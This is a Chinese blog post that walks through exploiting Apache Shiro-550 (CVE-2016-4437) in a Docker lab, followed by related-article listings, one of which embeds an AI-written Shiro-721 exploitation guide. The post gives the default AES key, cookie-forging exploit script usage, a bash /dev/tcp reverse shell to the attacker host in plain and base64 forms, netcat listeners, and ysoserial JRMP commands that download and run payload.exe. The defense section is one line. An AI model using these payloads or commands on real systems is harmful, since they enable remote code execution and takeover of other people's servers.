Shiro 550漏洞复现

最新推荐文章于 2025-03-17 12:42:48 发布
最新推荐文章于 2025-03-17 12:42:48 发布
阅读量1.7k 收藏 12
点赞数 1
分类专栏: 漏洞复现 Web安全 文章标签: shiro550 CVE-2016-4437 rememberMe java 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/119298205
版权

Shiro 550 CVE-2016-4437

Shiro简介

Apache shiro是 java 的一个安全框架。相对于Spring Security 可能功能没有那么强大,但是实际工作中用不到那么多,因此小而简单的shiro就足够了

ini配置文件

存放一些初始数据

可以理解为是一个 IoC/DI 容器,但是区别在于它从一个根对象 securityManager 开始。

漏洞原理

在登录框有一个 remember me(记住密码)的功能,用户的登录信息加密后存储在remember me的Cookie中。攻击者可以使用shiro默认密钥伪造用户Cookie,触发java反序列化漏洞,进而在目标机器上执行任意命令

cookie处理流程:cookie值 – Base64解码 – AES解密 – 反序列化

用了AES加密的密钥,此密钥被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥

payload构造

payload – 序列化 – AES加密 – Base64加密 – 发送cookie

环境搭建

方法一:

service docker start
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

请添加图片描述

请添加图片描述

方法二:

使用vulhub(专门搭建靶场环境的项目),在docker环境下直接搭建(参考fastjson)

git clone https://github.com/vulhub/vulhub.git		#下载vulhub
cd vulhub/shiro/CVE-2016-4437
docker-compose up -d  								#启动该漏洞的环境

请添加图片描述

漏洞验证

Shiro特征:

  • 未登录的情况下,请求包的cookie中没有rememberMe字段,返回包set-Cookie里也没有deleteMe字段
  • 登录失败的话,不管有没有勾选RememberMe字段,返回包都会有 rememberMe= deleteMe 字段
  • 不勾选RememberMe,登录成功的话,返回包set-Cookie里有rememberMe=deleteMe字段。但是之后的所有请求中Cookie都不会有RememberMe字段
  • 勾选RememberMe,登录成功的话,返回包set-Cookie里有rememberMe=deleteMe字段,还会有remember 字段,之后的所有请求中Cookie都会有rememberMe字段

方法一:

生成一个cookie脚本

img

使用shiro_key.py脚本获取密钥:

python shiro_key.py -u url

img

得到AES的密钥,替换payload生成脚本中的key

img

抓包替换cookie验证

勾选密码,抓包,替换cookie为 脚本生成的payload.cookie,发送数据包:

若dnsloh收到结果,则漏洞存在

方法二:

登录时,点击记住密码,利用burpsuite抓包验证,看返回结果是否有rememberMe=deleteMe

请添加图片描述

如果没有cookie字段,我们可以手动进行添加 cookie:rememberMe=1

漏洞利用方法一

版本 <= 1.2.4

软件下载地址:https://github.com/feihong-cs/ShiroExploit-Deprecated

输入url

请添加图片描述

选择 dnslog.cn进行检测,然后点击下一步

请添加图片描述

漏洞利用方法二

基于 ysoserial-0.0.5-SNAPSHOT-all.jar

python 运行环境搭建

#需要导入包
pip install crypto
pip install pycryptodome
#安装完之后 python安装目录下的\Lib\site-packages,将crypto文件夹的名字改成Crypto。并检查Crypto中是否有Cipher 和 PublicKey
#若还有其他问题,请仔细检查源码中import引入 和 下载的包的名字对应关系,尤其是大小写问题

请添加图片描述

请添加图片描述

生成 cookie

首先看一下工具内容

payload.cookie是通过 shiro_poc.py 执行得到的

python shiro_poc.py "ping 192.168.1.106"      #IP是目标机的IP地址

请添加图片描述

替换cookie验证漏洞

请添加图片描述

替换cookie的值

请添加图片描述

替换后点击发送

请添加图片描述

反弹shell

攻击者:192.168.1.105

目标机:192.168.1.106

一个加密网站:http://www.jackson-t.ca/runtime-exec-payloads.html

由于Shiro是用base64加密后再用AES加密在传输数据的,因此要进行加密

bash -i >& /dev/tcp/192.168.1.105/4444 0>&1		#192.168.1.105是另外一台kali(攻击者)的IP

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA1LzQ0NDQgMD4mMQk=}|{base64,-d}|{bash,-i}										#加密后的数据

重复上述操作 生成cookie 和 抓包替换cookie 的操作

python3 shiro_poc.py "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA1LzQ0NDQgMD4mMQk=}|{base64,-d}|{bash,-i}"										#在攻击者的主机(192.168.1.105)上执行此命令

请添加图片描述

请添加图片描述

请添加图片描述

NC设置监听

注意分清楚 控制端与被控端

kali(目标机)和 攻击者要角色反转,kali(目标机)上执行的命令要主动发给攻击者

nc -lvnp 6666			#攻击者(192.168.1.105)开启监听

请添加图片描述

如果目标服务器是windows的话,不能一键反弹shell,可以先在windows主机上 下载一个exe木马(前提主机上要有ysoserial.jar)

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget x.x.x.x/payload.exe -O payload.exe'
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 './payload.exe'

漏洞利用方式三

基于 ysoserial.jar

其实和方法二是一样的,都是基于 ysoserial.jar 这个jar包,只是python脚本有些不同

需要导入包pip install cryptopip install pycryptodome#安装完之后 python安装目录下的\Lib\site-packages,将crypto文件夹的名字改成Crypto。并检查Crypto中是否有Cipher 和 PublicKey#若还有其他问题,请仔细检查源码中import引入 和 下载的包的名字对应关系,尤其是大小写问题

python shiro_exploit.py -u http://192.168.1.106/login.jsp -t 3 -p "ping -c 2 ycat1b.dnslog.cn" -k "kPH+bIxk5D2deZiIxcaaaA=="

found gadget 表示有漏洞,利用 CommonsCollections2

请添加图片描述

利用的话,可以采用 JRMP的方式。也可以根据检测出来的 gadge来进行利用。

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget x.x.x.x/payload.exe -O payload.exe'java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 './payload.exe'

防御

不要使用默认的key

总结

Set<String> set = new HashSet<String>();     //set 是一个String类型的集合String s1 = "hello";String s2 = "world";set.add(s1);set.add(s2);

gadget 是什么,后续怎么利用

后续采用 JRMP的方式利用,可在设置监听,反弹shell。

Shiro-550 漏洞复现
qq_46440393的博客
03-15 2311
开始时间:2022/3/14 14:15 1、什么是shiro ? Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 2、shiro 可以用来干什么? 三个核心组件:Subject, SecurityManager 和 Realms. Subject:即“当前操作用户”。但是,在Shiro中,Subject这一概念并不仅仅指人
shiro550漏洞复现与分析
Re_ly0n的博客
05-12 828
远程调试环境 本地搭建环境有点麻烦,索性就直接起docker,然后远程调试。进入vulnhub启动docker环境,使用exec命令进入容器 查看进程发现存在漏洞环境的jar包,docker cp 打包到本地使用jar -xvf XXX.jar解压jar包,解压完成的目录结构 将shirodemo-1.0-SNAPSHOT.jar包添加到libraries 再将BOOT-INF添加到Modules中 紧接着修改下dockerfile,如下 version: '2' serv
Shiro-550漏洞分析与复现(CVE-2016-4437)
人们并不感谢罗辑
07-26 2604
Shiro中实现身份验证主要是靠Remember Me(记住我)功能,它允许用户在关闭浏览器后再次访问时无需重新登陆。用户登陆成功后生成一个加密的、包含用户身份信息的序列化对象,加密过程是 身份信息 -- 序列化 -- AES加密 -- base64编码 ,然后储存在remember Me的cookie中。当用户再次登录时,浏览器会携带这个remember Me发送给服务器。服务器解析从而获得用户身份信息,实现免登录访问,过程就是base64编码 -- AES加密 -- 序列化 -- 身份信息。
CVE重要漏洞复现Shiro-550反序列化漏洞(网络安全学习)
没有网络安全就没有国家安全
03-17 1429
CVE重要漏洞复现Shiro-550反序列化漏洞
shiro漏洞复现
黑白的博客
09-05 4409
声明 写这个的目的,也是为了学习,分享,交流,希望能被大家看到,我们可以互相学习,希望大家以学习为目的进行漏洞复现,如果有评论的话,我也会认真的看,指出我的不足,我也会认真的改正,嘿嘿,毕竟这条路需要一直学习新的知识,话不多说 漏洞描述 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload产生的过
Apache Shiro-550 反序列化漏洞复现
ZXT02的博客
03-02 1681
Apache Shiro550反序列化(CVE-2016-4437)漏洞分析、复现及修复。
Shiro-550漏洞详解及复现
m0_64481831的博客
03-07 2947
Shiro是Apache的一个强大且易用的Java安全框架,用于执行身份验证、授权、密码和会话管理。借助Shiro易于理解的API,用户可以快速轻松地保护任何应用程序----从最小的移动应用程序到最大的web和企业应用程序。Shiro是一个Java的安全框架,用于执行身份验证、授权、密码和会话验证。
shiro550漏洞复现(基于docker搭建&&自动化工具实现)
m0_52701599的博客
03-25 953
shiro550漏洞复现(基于docker搭建&&自动化工具实现)
shiro550漏洞复现
02-10
### 关于 Apache Shiro 550 漏洞复现 #### 环境准备 为了成功重现Shiro 550漏洞,需先准备好实验环境。这通常涉及安装特定版本的Apache Shiro以及配置相应的Web应用程序[^3]。 #### 漏洞概述 CVE-2016-4437Shiro...
Shiro-550反序列化漏洞复现
made_cola的博客
08-29 322
shiro-550主要是由shirorememberMe内容反序列化导致的命令执行漏洞,造成的原因是默认加密密钥是硬编码在shiro源码中,任何有权访问源代码的人都可以知道默认加密密钥。于是攻击者可以创建一个恶意对象,对其进行序列化、编码,然后将其作为cookie的rememberMe字段内容发送,Shiro 将对其解码和反序列化,导致服务器运行一些恶意代码。
Shiro漏洞复现Shiro-550
weixin_51151498的博客
12-19 913
Shiro漏洞复现Shiro-550
Shiro反序列化漏洞Shiro-550反序列化漏洞复现
人若无名,便可专心练剑
03-14 1590
Shiro-550反序列化漏洞大约在2016年就被披露了,但感觉直到近一两年,在各种攻防演练中这个漏洞才真正走进了大家的视野,Shiro-550反序列化应该可以算是这一两年最好用的RCE漏洞之一,原因有很多:Shiro框架使用广泛,漏洞影响范围广;攻击payload经过AES加密,很多安全防护设备无法识别/拦截攻击……
Shiro反序列化550漏洞复现
故事讲予风听
07-05 1602
Shiro 是一个强大且易于使用的 Java 安全框架,用于身份验证、授权和会话管理等功能。它提供了一套灵活的基于角色的访问控制(RBAC)机制,可以轻松地集成到现有的 Java 应用程序中。影响版本原理shiro默认使用了Cookie RememberMe Manager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞shiro的身份认证工作流程。
Shiro历史漏洞复现 - Shiro-550
HAKUNAMATATATTA的博客
01-03 2480
Apache Shiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理,可用于保护任何应用程序的安全。Shiro提供了应用程序安全性API来执行以下方面:1)身份验证:证明用户身份,通常称为用户"登录";2)授权:访问控制;3)密码术:保护或隐藏数据以防窥视;4)会话管理:每个用户的时间敏感状态。上述四个方面也被称为应用程序安全性的四个基石。
Shiro-550漏洞复现
weixin_51641247的博客
03-25 252
利用集成工具复现shiro550漏洞
shiro-550漏洞复现CVE-2016-4437
热门推荐
ATpiu的博客
03-22 1万+
漏洞概述 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 影响范围 Apache Shiro版本<=1.2.4 漏洞复现 使用vulhub起shiro对应环境 gadget使用CommonsBeanut...
漏洞复现】Apache Shiro-550反序列化漏洞复现
isxiaole的博客
12-18 3322
1、Apache Shiro介绍 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 2、漏洞介绍 在Shiro <=1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的re.
shiro721漏洞复现过程
最新发布
03-24
<think>好的,用户想了解Shiro721漏洞复现步骤。首先,我需要回忆一下相关的知识。根据提供的引用内容,特别是引用[2]和[4],Shiro721影响版本是Apache Shiro <=1.4.1。复现步骤通常包括环境搭建、利用漏洞获取权限、编写或使用Payload等。 首先,环境搭建部分,用户需要Docker来拉取镜像并运行容器。引用[2]提到使用vulfocus/shiro-721镜像,所以需要确认正确的Docker命令。然后,漏洞利用需要生成恶意Cookie,通常涉及反序列化攻击。但Shiro721与Shiro550不同,它需要有效的Cookie并通过Padding Oracle攻击来加密Payload,因此可能需要特定的工具,比如shiro-exploit工具箱或者手工构造Payload。 用户可能还需要了解如何检测漏洞是否存在,比如发送一个无效的RememberMe Cookie并观察响应是否有特征。此外,反弹shell的步骤需要生成Payload,可能使用ysoserial或类似工具生成,然后通过工具加密并构造请求。 需要注意的是,复现漏洞需要一定的网络安全知识,确保在合法授权环境下进行。同时,引用中提到的工具如shiro-exploit可能需要从GitHub获取,用户需要安装相关依赖,比如Java环境。 可能的问题点包括Docker环境是否正确启动,Payload生成是否正确,加密过程是否无误,以及如何判断攻击是否成功。此外,用户可能对漏洞原理感兴趣,比如为什么Padding Oracle攻击可以在这里利用,或者如何修复该漏洞。因此,在回答中需要分步骤详细说明,并提示安全注意事项。</think>### Shiro-721漏洞复现步骤详解 #### 一、漏洞简介 Shiro-721是Apache Shiro框架中的反序列化漏洞,影响版本为**Shiro <=1.4.1**。攻击者通过构造恶意RememberMe Cookie,利用Padding Oracle攻击加密反序列化Payload,最终实现远程代码执行[^2][^4]。 #### 二、环境搭建 1. **拉取Docker镜像**: ```bash docker pull vulfocus/shiro-721 ``` 2. **启动容器**: ```bash docker run -d -p 8080:8080 [镜像ID] ``` 访问`http://localhost:8080`,使用默认账号`admin/admin`登录[^4]。 --- #### 三、漏洞验证 1. **检测RememberMe功能**: 登录后查看Cookie是否包含`rememberMe=deleteMe`字段,确认Shiro是否启用该功能。 2. **发送无效Cookie测试**: 使用Burp Suite修改请求,替换`rememberMe`值为无效Base64字符串(如`123`),若响应包含`rememberMe=deleteMe`,则存在漏洞[^3]。 --- #### 四、漏洞利用(以反弹Shell为例) 1. **生成Payload**: 使用`ysoserial`生成反弹Shell命令: ```bash java -jar ysoserial.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > payload.bin ``` **注意**:替换IP和端口为攻击机地址。 2. **加密Payload**: 使用`shiro-exploit`工具加密Payload,需提供有效的RememberMe Cookie和攻击目标URL: ```bash java -jar shiro-exploit.jar http://localhost:8080/login [有效Cookie] payload.bin ``` 工具会自动通过Padding Oracle攻击生成加密后的恶意Cookie。 3. **发送恶意请求**: 将生成的Cookie替换到请求头中,触发反序列化漏洞: ```http GET / HTTP/1.1 Host: localhost:8080 Cookie: rememberMe=[加密后的恶意Cookie] ``` 4. **接收反弹Shell**: 在攻击机使用Netcat监听: ```bash nc -lvnp 8888 ``` 成功获取目标服务器Shell[^3]。 --- #### 五、修复建议 1. 升级Shiro至**1.4.2及以上版本**; 2. 配置`securityManager.rememberMeManager.cipherKey`为随机密钥; 3. 禁用RememberMe功能(非必要场景)[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

牛顿编程

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值